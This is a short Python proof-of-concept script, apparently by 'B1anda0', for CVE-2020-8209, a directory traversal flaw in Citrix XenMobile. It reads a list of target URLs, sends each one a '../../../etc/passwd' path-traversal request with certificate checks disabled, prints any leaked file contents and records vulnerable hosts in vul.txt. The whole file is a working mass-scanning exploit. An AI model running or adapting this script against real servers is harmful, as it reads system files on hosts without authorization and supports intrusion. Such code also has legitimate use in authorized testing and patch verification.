#!/usr/bin/env python
# coding:utf-8
# author:B1anda0

import requests,sys,colorama
from colorama import *
init(autoreset=True)


banner='''\033[1;33;40m
  _______      ________    ___   ___ ___   ___         ___ ___   ___   ___  
 / ____\ \    / /  ____|  |__ \ / _ \__ \ / _ \       / _ \__ \ / _ \ / _ \ 
| |     \ \  / /| |__ ______ ) | | | | ) | | | |_____| (_) | ) | | | | (_) |
| |      \ \/ / |  __|______/ /| | | |/ /| | | |______> _ < / /| | | |\__, |
| |____   \  /  | |____    / /_| |_| / /_| |_| |     | (_) / /_| |_| |  / / 
 \_____|   \/   |______|  |____|\___/____|\___/       \___/____|\___/  /_/  
                                                                                                                                                       
'''


def XenMobile():
	headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"}
	payload= '/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd'
	poc=urls+payload
	try:
		requests.packages.urllib3.disable_warnings()#解决InsecureRequestWarning警告
		response=requests.get(poc,headers=headers,timeout=10,verify=False)
		if response.status_code==200 and "root" in response.content:
			print(u'\033[1;31;40m[+]{} is citrix xenmobile directory traversal vulnerability'.format(urls))
			print(response.content)
			#将漏洞地址输出在Vul.txt中
			f=open('./vul.txt','a')
			f.write(urls)
			f.write('\n')
		else:
			print('\033[1;32;40m[-]{} None'.format(urls))
	except:
		print('{} request timeout'.format(urls))


if __name__ == '__main__':
	print (banner)
	if len(sys.argv)!=2:
		print('Example:python CVE-2020-8209.py url.txt')
	else:
		file = open(sys.argv[1])
		for url in file.readlines():
			urls=url.strip()
			if urls[-1]=='/':
				urls=urls[:-1]
			XenMobile()
		print ('Check Over')